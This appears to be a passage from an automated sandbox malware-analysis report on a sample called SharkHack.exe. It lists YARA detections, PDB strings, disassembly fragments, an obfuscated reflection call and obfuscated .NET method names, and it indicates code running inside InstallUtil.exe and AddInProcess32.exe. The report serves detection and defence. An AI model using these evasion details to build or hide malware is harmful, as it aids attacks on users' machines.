                          Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.ni.pdb source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdbn=h source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Core.ni.pdbRSDS source: WER11DB.tmp.dmp.13.dr

                          Data Obfuscation

                          Source: Yara match | File source: 0.2.SharkHack.exe.5e70000.3.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 7.2.InstallUtil.exe.44e31f0.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.SharkHack.exe.5e70000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 7.2.InstallUtil.exe.44e31f0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000000.00000002.2881426397.0000000005E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000007.00000002.2915403945.00000000044E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000007.00000002.2915403945.000000000443A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000007.00000002.2903541486.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.2860912420.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: SharkHack.exe PID: 6224, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 2476, type: MEMORYSTR
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, TRYKkNvh8fRn9U4uBi5.cs | .Net Code: Type.GetTypeFromHandle(Fap0GrmKF5nC91t69JH.ApPtAllIw51(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Fap0GrmKF5nC91t69JH.ApPtAllIw51(16777245)),Type.GetTypeFromHandle(Fap0GrmKF5nC91t69JH.ApPtAllIw51(16777259))})
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, TRYKkNvh8fRn9U4uBi5.cs | .Net Code: Type.GetTypeFromHandle(Fap0GrmKF5nC91t69JH.ApPtAllIw51(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Fap0GrmKF5nC91t69JH.ApPtAllIw51(16777245)),Type.GetTypeFromHandle(Fap0GrmKF5nC91t69JH.ApPtAllIw51(16777259))})
                          Source: C:\Users\user\Desktop\SharkHack.exe | Code function: 0_2_06029CE8 push es; ret 0_2_06029CF4
                          Source: C:\Users\user\Desktop\SharkHack.exe | Code function: 0_2_087417F5 pushad ; ret 0_2_0874D915
                          Source: C:\Users\user\Desktop\SharkHack.exe | Code function: 0_2_089C04E5 push edi; ret 0_2_089C04E6
                          Source: C:\Users\user\Desktop\SharkHack.exe | Code function: 0_2_08A0AD50 push es; ret 0_2_08A0AD60
                          Source: C:\Users\user\Desktop\SharkHack.exe | Code function: 0_2_08A0C8D4 push esi; retf 0_2_08A0C8D7
                          Source: C:\Users\user\Desktop\SharkHack.exe | Code function: 0_2_08A0C8D8 push 3EE8F88Bh; retf 0_2_08A0C8EF
                          Source: C:\Users\user\Desktop\SharkHack.exe | Code function: 0_2_08A02853 pushad ; ret 0_2_08A028FD
                          Source: C:\Users\user\Desktop\SharkHack.exe | Code function: 0_2_08A0C853 push D3E8F88Bh; retf 0_2_08A0C85A
                          Source: C:\Users\user\Desktop\SharkHack.exe | Code function: 0_2_08A02555 push edi; iretd 0_2_08A02556
                          Source: C:\Users\user\Desktop\SharkHack.exe | Code function: 0_2_08A0274B pushad ; ret 0_2_08A028FD
                          Source: C:\Users\user\Desktop\SharkHack.exe | Code function: 0_2_08A0274B push 480000C3h; ret 0_2_08A02935
                          Source: C:\Users\user\Desktop\SharkHack.exe | Code function: 0_2_08EFA82D pushfd ; retf 0_2_08EFA82E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 7_2_07BAC338 push 0000003Bh; ret 7_2_07BAC33D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 7_2_07BAC30B push 0000003Bh; ret 7_2_07BAC30F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 7_2_07BAADA4 push 0000005Dh; ret 7_2_07BAAE0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 7_2_07BA2555 push edi; iretd 7_2_07BA2556
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 7_2_0801B952 push 0000005Eh; ret 7_2_0801B980
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 7_2_08018172 push esp; ret 7_2_08018179
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 7_2_0842ADF0 push 00000059h; ret 7_2_0842AE10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 7_2_0842A6CD pushfd ; retf 7_2_0842A6CE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 7_2_085E17F5 pushad ; ret 7_2_085ED915
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 9_2_03034DC9 push ss; ret 9_2_03034DCF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 9_2_030341D4 push es; iretd 9_2_030341DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 10_2_0043F000 push eax; mov dword ptr [esp], 5B5A5908h 10_2_0043F005
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 10_2_00445408 push ebp; ret 10_2_00445409
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 10_2_0044866F pushfd ; retf 10_2_00448677
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, vbJysBiKR1qvJiGrKqe.csHigh entropy of concatenated method names: 'pRBir33wN1', 'RoyiYrH1K6', 'R2Wiht9r4f', 'kl944xiuYB7TT1l5Inm8', 'PqXV1cius1YWmrOA7p7b', 'mqvUu0iurlLbT1HcsgM5', 'kyv6j7iuhuSX5vtcZ82L', 'KPF2ctiukq6aupc4PZPU', 'CdfZAPiuD4ZPEOjHMXqN'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, aiivD1jFb3ZoBVhwvH.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'NUbL9SjsI'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, avWVKRHwOK5QhelB7wy.csHigh entropy of concatenated method names: 'DQyHasOjw5', 'k6r', 'ueK', 'QH3', 'blfHIDWCe2', 'Flush', 'mxCH8Vielg', 'lOYHXXeK0U', 'Write', 'oTpHvKIfXZ'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, bjUD4qciiGm35ihtVho.csHigh entropy of concatenated method names: 'lqlcWgBqO2', 'FOAcFJ3uEm', 'A1bcAK34IE', 'pyUyeMiBX2jZNNoWl7eh', 'lNct3CiBvT30lAx0cwCN', 'NHTALFiBxln8KeaJZ4y4', 'KcUy90iBmHsdoDGLHTGM', 'h6EDLLiBCQ6UpG9pQLt8', 'COuvGniBzuCYUS2gaTE3', 'WiGUN0iHdpt8PpelCcST'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, KBLMFH6KkAlYsgGtW00.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'LWMejdinRTJ496yh7B5U', 'vcQ8i2inN0XuciRBB1II', 'Y4KF5qinuvF4uav4o1jb', 'h1F6r791Tl'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, TOBrL6X7YwccS2N0NZJ.csHigh entropy of concatenated method names: 'zm0XrQUEr3', 'qwEXDtttrI', 'ihZXeZIv5Z', 'GORXV39K91', 'sifXfoxlyj', 'eiYXoBKEY7', 'DtaXRTXFRo', 'cOjXNREx1h', 'Dispose', 'G5dOXFixcj7lHY6Xsmkg'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, CvBTB634WJbsbdNk0HA.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, TRYKkNvh8fRn9U4uBi5.csHigh entropy of concatenated method names: 'rsb58CimF39qL8auIGBi', 'TOuEQdimAEilESGTAkdn', 'yeQxIiQa2f', 'K96RrXim6imBPBYuaCF6', 'yhOIVoim2WXPyNieqygP', 'nfyYlsimUrQICBGa8YRe', 'aVlhK4imJMpY9cmF3OgL', 'dCVYgnim7gcRxUENV4Dj', 'I4IeUAimKMeEV4QD9Q8S', 'LceNI4imsVEybgty6fnA'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, eufhKGg27Q7RWQ163S4.csHigh entropy of concatenated method names: 'y7AgJ47Ibb', 'lSCg7ih3wl', 'uIegKhUsFe', 'y6RPLViqggMjEGrIc45o', 'mM5C0diq6qNG3SZCugTD', 'rn4QOaiq9cVuJYaDvD4K', 'glm8ckiqcsVZJNUXXj7g', 'fLuOxDiq2AQSK1wN9g0n', 'HRtSOjiqUHNyg4RVtdpu', 'KfWc9viqJKlWKEraPRGL'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, njrujeAENEBnoTwLEll.csHigh entropy of concatenated method names: 'gORAxKvssZ', 'pPxAmA6eHe', 'HFZACYZWUP', 'MEPAzuvJVK', 'MZL9d5qASX', 'oBD9ig3hBF', 'sT19tBjD21', 'LVbTJ4iBcmQBOH8J7rTk', 'J5wk1HiBA0PX4UymQGsi', 'Pu09Q1iB9hTPmfcv6so7'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, enykyluTt8tntLMmTmH.csHigh entropy of concatenated method names: 'OLMumRSCYl', 'XkeuzjtoqW', 'kCJuj7fe2v', 'mfHuZbqKI1', 'iFiuLxc6SV', 'RuFu0QjAeB', 'RXeu5biLrD', 'sjxu1ADZNe', 'Y7xuw2TJJt', 'ubguEMjAkj'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, M6XlSeiCbULdwXerUj5.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'nJMigi5FRve', 'emDiFi8Sspd', 'XadkpOiuvpGcqrg9hvsX', 'DF2j12iuxB4Pj4VPlrd3', 'jpUPFAiumHrEqj8EeZMR', 'EtDRnJiuCOSlpFltrdUo'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, t0QDrItwOiM5sAdQ4F5.csHigh entropy of concatenated method names: 'lExWcRDgrw', 'KolcrCiyX5CWwth6sTBe', 'juj3y4iyvb1nOjAXfwVa', 'ESwdv3iyxydv8mZDkLjs', 'uxtEA3iyIA53mwnTtkcB', 'puxb74iy8SWxkNxoF1ko', 'Ns2MNsiymU1qRnHgXnIi', 'RmGB4IiyCfOVAqujobat', 'U3PWd1dYbZ', 'iUiWtNZQ5Z'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, W367m4PC7kPOgq5eVvx.csHigh entropy of concatenated method names: 'R3g4dwI4oQ', 'uMc4iKEW79', 'Yd7', 'SMu4tbhN0y', 'CxB4Whs2Hm', 'vkW4FKlUk5', 'Qpg4AR4uil', 'r63Rrhi15A1msADN2QPG', 'veC1RPi1LKxFDkV04pDI', 'YVi9oci10DmbNJMWq76s'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, K3EvFZAQXLSG11lHyGN.csHigh entropy of concatenated method names: 'q64', 'P9X', 'D4BiFKx8wfY', 'vmethod_0', 'YDaig94u3Hi', 'imethod_0', 'n51hkKi4ZU9a8MVyWaVu', 'oWnesRi4L3xrcrtSsKuA', 'UZotk0i406BJ1BiNUuqY', 'hDiIvdi45gODyG82NnTk'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, j85yTp6tKZORN4qjSRA.csHigh entropy of concatenated method names: 'xOV6FQR8AC', 'xnT6AxoVa9', 'R0B69aWJWa', 'Iny6cYJnFR', 'Sdx6gEr1t8', 'pTH6661VtQ', 'ojD62cBUDt', 'OL56USE3J5', 'Wdk6J6oG7a', 'G3J6772WP1'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, ONP1BPc6cApGusCcp5X.csHigh entropy of concatenated method names: 'EZMcUbtrsd', 'DHxcJ1RUq7', 'fM9Tl2iHFmaypPPjn0QJ', 'neRT3KiHtLYNcxjoQLaI', 'T8Ql6FiHWgdF2BXHSgGw', 'WVyjOXiHAoagRkcrDVCt', 'F50sYGiH9gTkGZwXhHfJ', 'eJljkFiHcqRNLyYjru4M', 'L4UnEjiHgumuesN9t37e'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, CdKxLo9TWUhYReDFyxB.csHigh entropy of concatenated method names: 'YAd9Xs9Qrk', 'WTG9vFl8cd', 'hU19x0ovVn', 'a8U1UPiBaR75mNMVM3rs', 'eiMjpIiBIXpVDpW1Wwg2', 'cmdZSQiBwGXUeVguP741', 'Heo1juiBEOY4hffS6TGV', 'o869j9psnq', 'EbA9ZZoBWW', 'QiZ9LVZXA6'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, doZtkVpKf8U8WppqJbu.csHigh entropy of concatenated method names: 'Gw4pp3Mn2I', 'msUsMSiSZtYCWhASMk1r', 'TSOv3EiSbiimwTjCU0yD', 'v02dWiiSjuj7HvgVQXuQ', 'Y5yprX0fLJ', 'G5CWGdiSOhW3J5malMtj', 'eoji8piSnwH4C7qwDQV2', 'UpXuYYiSMNQ3seLk7dnD', 'lpuy2aiSlA7vxNiYqGdc', 'HEILSoiSQCTwHyWRkVui'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, kBmXH9l497Qp6LWRqH1.csHigh entropy of concatenated method names: 'GSIlHslRdW', 'SMNlqwjkfL', 'DrnlnckADm', 'rY3lMcjsHs', 'MrrlOa28aA', 'VDCllhn4oQ', 'Ci8lQ4iZXB', 'KxjlSwlAAN', 'hswlTLLiGM', 'QWPlbB559Z'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, tkqlLoFQh50kIsJmFdn.csHigh entropy of concatenated method names: 'CTTFm2EQPu', 'KdxrEQi4WA4KGGA83aKp', 'dqXN5Hi4ibkkuNYfDSvL', 'E6ZRdRi4ts6Iix85QWAo', 'i9fy9ti4cjyxOXU8ieh6', 'Td5Anxi4Afx43aKysD5w', 's3ShvRi49lu3FMYVCs6i', 'cN9EIei4gOBIhPdWyacg', 'nLFA9k83yW', 'bbjkHli4JYNdegpEhNMR'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, j5ldwtDysIL7AmxK4MB.csHigh entropy of concatenated method names: 'GaTDMYN2FP', 'VKvEGQiQ8CH8PauAgAHw', 'SqPmOtiQagjD9embqkAh', 'CHxV7NiQIDbAHo8ICewc', 'vN4WWgiQXqugIxVQLrFp', 'KjeDP8M6tr', 'tqmD46PADe', 'ykBDBQrvD3', 'bwDlvPiQ56JXxAKauqSr', 'r9E2S3iQ1cnB9ncuPPve'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, E3o6QD3SlpgCyI5E6Rs.csHigh entropy of concatenated method names: 'wDH3bq90Rx', 'JZL3ji9pIL', 'lQt3ZkJW6A', 'Y4p3LsC6yh', 'o8c309LfPh', 'A1i35O5Lww', 'fEH31ZakHP', 'Lsx3w3EgsL', 'QKs3ElUcCV', 'fR93aP2Xec'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, to79D6fEqAGFyBNeY0p.csHigh entropy of concatenated method names: 'PX4fIii4Kn', 'GwPf8WdyJi', 'bpOfXlh5Ya', 'XFSfv2EsJL', 'z10fxyxMwW', 'nfZC49ijOPoRTNLsNB4B', 'vY8Y7HijnwHbdBwefhK3', 'TPciraijMI3fsfiyCJmi', 'XU0bY6ijlLmm86iu86xI', 'TOCFUXijQT8BYiGUxr3x'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, WTs7qahlV64qvKrIvj.csHigh entropy of concatenated method names: 'SkHq1dNMd', 'LMKXHviNB3wuhWF9puNX', 'S1P3fXiNHTv2qmCPkFkg', 'RQr4I6iNPxBceHs4cSvL', 'pvoKTViN4r8YILC0F5xr', 'oEhDjiANh', 'f6kp1TRE4', 'vRxGQlJfG', 'VYGeQhudC', 'mi5V1AwRD'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, XnJrhIl69rXGORX84dr.csHigh entropy of concatenated method names: 'JnhloxK0r2', 'fSlPwQiI9Tksvp8rHrS3', 'Nt8lfHiIcFdrHeMunqZF', 'WZH1YpiIFdERgFh0UODh', 'gIdShDiIATrpcxeHHZYj', 'fHq5asiIgCiCGPBRDysK', 'IPy', 'method_0', 'method_1', 'method_2'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, EHXH4ePZVLGwViqivQ6.csHigh entropy of concatenated method names: 'Ky5P0IYQns', 'GcpP5pcIhd', 'xljP16IuaG', 'VycPw2NSUm', 'YQiPErtfw7', 'EVMjAsi1nKmsoCXQoJ3I', 'ybi7Lfi1MuYsYs3TH0qZ', 'JV6mGwi1OGb9ZNpPG7W3', 'QT4CV7i1HwtKnnNeM6bb', 'bgZGPxi1qZga6oWa9owa'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, JALrlWcMr32WYbVn0It.csHigh entropy of concatenated method names: 'P9X', 'vmethod_0', 'MQXiFff14W8', 'pgjigUnOEKY', 'imethod_0', 'LJABcoiHbx3Msjd5RMSk', 'VyTnnXiHjR7qM1FcpXIZ', 'RHvSmEiHSaGejFE3GaGv', 'jWq1hkiHT6atkWG94NmV', 'avIA4biHZMnSrWMoLXdc'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, DxdlsJWwhGQkGc7gyLW.csHigh entropy of concatenated method names: 'k7xFWTgw8K', 'IXGFFg6IfQ', 'GvrFAPWVNK', 'VUCrZDiPdqC32dlULga1', 'yHwQGeiPiA82vx35pHQH', 'nhb6dGi3CbGnHmdEtle8', 'M97Kk5i3z9k4kNGNNwbb', 'e2JFU72eOl', 'cweULTiPAlIkIhUI0L3S', 'zqNlKAiPWeOyONNmQoiG'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, qWmkX1X4jrPDrUUx6M9.csHigh entropy of concatenated method names: 'curXHHtjBT', 'wysXqMKiDy', 'qiKXnX6hRk', 'vn1XM2wFd3', 'Dispose', 'eGwa8PixYUNNGZRoV7fh', 'PGCNvPixsNNGbGGLhbY1', 'wyRMcXixrJcaDnHwiFOl', 'lSuue9ixhfMhihBvP5hc', 'eE3XyjixkFy9jBYXtAvO'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, rGEnirI4PkjmAkeSbof.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'UniIHxoqeV', 'q1DNRciXPAiwqPfbBuXw', 'IH2pfEiX4kOIPLEpmfwq', 'w2aU2ZiXBA4xr0Cspiqc', 'E4mmKpiXHFGyfev9LXmL', 'AHhLH0iXqlCtytBNQ8dn', 'TixsTOiXnYwt6UEpf5pf'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, PQrxBjIODNycEAnm1rG.csHigh entropy of concatenated method names: 'pD6igNlvNVY', 'pgVi9R7L4Mu', 'TekrS0ivWxZkxmDwwQaK', 'S0PgjmivFAKdWkkpFtFL', 'eW0fqkivAwXEdR4PNAaf', 'wfcIUIiv6KgySMi8nyMd', 'uIbeHUivcgfW8UhQFrd2', 'FoJAx4ivgqK0KW0AHBX8', 'dqpFYeiv2O9wmRFbIu7E', 'imethod_0'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, PLaouIpXWde9VO39AvE.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'g08pxWXGVJ', 'MbgigkTKIC1', 'mGLcf9iTVgmIgkly0GsH', 'DIHEaOiTGfK374jPwlbQ', 'KPnm40iTeBomsv4VoVmX', 'zi7UrxiTfGAGgWj3iSdD', 'vgCQWniTojm3Ed7de6Jc'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, ADxUWXcTm5fwO7hpxRa.csHigh entropy of concatenated method names: 'FWTcXAUNQm', 'F5IcvcXehI', 'RQPALIiHXTEww1HcNYOe', 'IrA80CiHIKvt7lGuj7x9', 'MQaKlIiH8QRQvOip87K9', 'kp1Nb8iHvwiVkq2tu0PS', 'LKycjJfciT', 'bcccZsmQID', 'FiMcLg9liF', 'hKJc0A1bDQ'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, apHiiOguZikCMHPSt2Q.csHigh entropy of concatenated method names: 'Ekdg3XsFqu', 'ocLgPLUfXW', 'xERg4Ul8GB', 'l7jgB03ODO', 'HAkgHaDEZn', 'C2ugqIHStw', 'bwhWG1iqO2lHWWH8NRgv', 'w8yosbiqlEPnQVH8bAk1', 'LSUJo3iqQEXD7j6VUPIl', 'FNjSRCiqS6SmZ8QRUOZg'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, psNs80sV3GoHG24hGi5.csHigh entropy of concatenated method names: 'rK6D761SuV', 'paCDKldvFP', 'qAXvlOiQ4Ec9ea6vS3yA', 'oHbijViQ3T55xvaqfXDo', 'vHpFwJiQPJiZg62EapsP', 'f6oPWEiQBaMf65g5ZECW', 'EGjDD7Vihr', 'ntSXbfiQMlhmg4j6YqVb', 'hnKrZciQqTPEYEPCLkoB', 'pk5x5BiQnSAn6r885X24'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, R8iwBJmQj5yJVN7ORn9.csHigh entropy of concatenated method names: 'cvsi9BLmhi7', 'MwZi9HY1wIP', 'n8Ai9qOi27q', 'v1ai9n5DKKV', 'C3Fi9M7sE6u', 'zmAi9ORNrIh', 'eO4i9lJrHc0', 'rgLCAoclPv', 'X7mi9Q6WV2c', 'm2Zi9SiupOE'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, cnVlqyHnmS6FTQws4nV.csHigh entropy of concatenated method names: 'Close', 'qL6', 'WrHHOZx8Hc', 'tWPHlXpT8O', 'pcUHQ42U8p', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, WqFy2NyLWpuB3vb1eE7.csHigh entropy of concatenated method names: 'Nu7y56rjt3', 'g7ay1Kjw10', 'XZTywWNiuB', 'L98Udni0R22QMappggOc', 'LED3hdi0NAdHfG12qnAu', 'UpJKL0i0uraoAf1lDWHS', 'nqR5YGi0yp9qQ1sd01vj', 'CIwRtCi03TrbYSAUaQ8t', 'kvSveAi0Pwku1NXmWCB2', 'VyOgc5i04N2bAwsFg3x0'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, h1V98lGUl2NtAlQaa4v.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'dK0igembaTh', 'hk6igVn0YHx', 'cwlIrNiTTHO9uET3kvEB', 'HW9GngiTbXsU8lUq8o2d', 'rQipGqiTjsGYUunpIorJ', 'c2JaF4iTZRVbWahr5aS8', 'RlAuG3iTLQyOYFkrBFyE', 'TQDGroiT0B34wBPPxI9T'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, DVe77uArnwnNDQv3Dbl.csHigh entropy of concatenated method names: 'BdoAuXcNyQ', 'sbYAyWySxj', 'RkYA34EEpW', 'IMQQgai4HEgK1Fgd6ict', 'GoPTa3i4qipsqQfMZ9yx', 'xenTsWi4nVRMnJSnr8lm', 'urpAflrHeT', 'PeRAof6LJe', 'uHeQqNi4P9NQqL5xspvZ', 'MncRqii44PvKVecdRfNw'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, agSmQGA6x8YKfIQZYUp.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'uLJigAm668E', 'emDiFi8Sspd', 'ncBawSi4r78xPuXP857Y', 'KIuUkIi4YFvxDstVLyQR', 'daIEshi4hKQPS9QdQWr0', 'wDNqoni4kLWaBydrmwIf'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, bPe62WgY07dCC4gPiXE.csHigh entropy of concatenated method names: 'd2fgpQOWB6', 'vwSyCxiqVjHtUKlW7UW9', 'lBBWsCiqGBsxAxI7oKNa', 'dAyGTNiqes33YSA7Yo1m', 'Ql6CaQiqfelB3Mknc8h0', 'Xj6gkV3Aqk', 'r6a5cZiqYkuSybRuQaAm', 'q4ti3wiqhVuBqy8VAOjT', 'pImJvwiqksfAkO03akl0', 'RgYlN6iqsUB3eaSvj4DU'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, xCU4oKgLJwFqTGxqALe.csHigh entropy of concatenated method names: 'WajgXCOYMc', 'IhU4i8iqzWWhVtKQVd6A', 'BTYafhiqmcBE2gdhsklL', 'GBn7YTiqCgXd6ugUTmEr', 'YMYbHFindPXSSOwRNCxU', 'sl0WgdiniVqHWAphT448', 'P9X', 'vmethod_0', 'PggiFuwnE7M', 'imethod_0'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, l2tJJiMnOtjjkuebrby.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'sV3ex6iaGpghvPguWQMr', 'W7gWWtiaD5nB6hPN9lfv', 'otvILPiaparygUU689XY'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, EyYZxMzQJxf9HhxQVX.csHigh entropy of concatenated method names: 'fVjiiqAZ3I', 'ahPiWB98ge', 'En4iFpwGRO', 'dBciA37MDV', 'IWRi97MDn0', 'eNticQ6lY6', 'csPi6Pl1cD', 'GnbyEriu9vy9T1GSgwUA', 'pfnyumiuceCGTZBw2tYP', 'r9HXGLiugyUiFJC9bmpX'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, UXLx0DRf21RZHTP33Hg.csHigh entropy of concatenated method names: 'GSWRRDjcyV', 'fnWRNYf7TQ', 'Vl1RuskHFv', 'VkQRyTjOv6', 'VysR3f8YMA', 'O8tddWiZlfG4LlbiejiZ', 'jn4uHwiZM1Lck4f9bIn6', 'hTdOpNiZOY6hbwaXVVfB', 'qKikmciZQ0OK6AFIPUut', 'I3vIeeiZS72BXjCfNh2G'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, cmRE6fuWoqjFh1rfG4S.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'Dh8uA1TJGA', 'Write', 'nOpu9O2qJk', 'VWguclUjAg', 'Flush', 'vl7'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, eOnlQ4DIVobuujehJy8.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'm4Gig7ovubh', 'TGhiFL1Jfm5', 'vnQHFwiS7pRjTsrkh6EJ', 'Sn9Lp8iSKXPoCgpTYCTV', 'gOWmHtiSs7dhTNmJ3FjE', 'NCA0rRiSrIQmDORop8MB', 'Qv7QG4iSYC5QXDC4J1BH'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, wfHRURyCvBN9uMe08Zq.csHigh entropy of concatenated method names: 'a8E3dv4sxr', 'Ydp3ikKJtr', 'uEt3t7yO7s', 'hq03WKTNHO', 'zGm3FInf2q', 'ICN3AcpAqg', 'SoVv22i0Lxm98HA0Y3dw', 'FnbkbQi0jtYRZDEdEJGI', 'PisA2si0ZWYXXBNoaC4U', 'l6Nq5Di00NbEQgmZ4SMv'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, xOXNLvtA6BvgJw9KH17.csHigh entropy of concatenated method names: 'PQdtchWSZQ', 'qVMtgFlUpP', 'GR3t6s3Qqd', 'FMFt29p8AZ', 'R1t78TiyUol8wQPA0nlL', 'oLEKFqiy6PGlflykFJ7u', 'leQmHDiy2614NMNugdnH', 'HnBEBOiyJxcAf2fTrOlB', 'HKokANiy7bk6hw68PJnN', 'IDnMlPiyKugYYIXf5rpI'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, Sj1QuemkrWd6ods55g5.csHigh entropy of concatenated method names: 'k3jm3lnSAg', 'obZmPBFwyZ', 'zHLm4Yif3b', 'ornmBOoKbh', 'PV0mHt5Ko4', 'ri6mqTQ8Zr', 'zQhmnbVMsp', 'lLwmMmDGeA', 'HUEmONQdQc', 'lYEmlpmyy1'
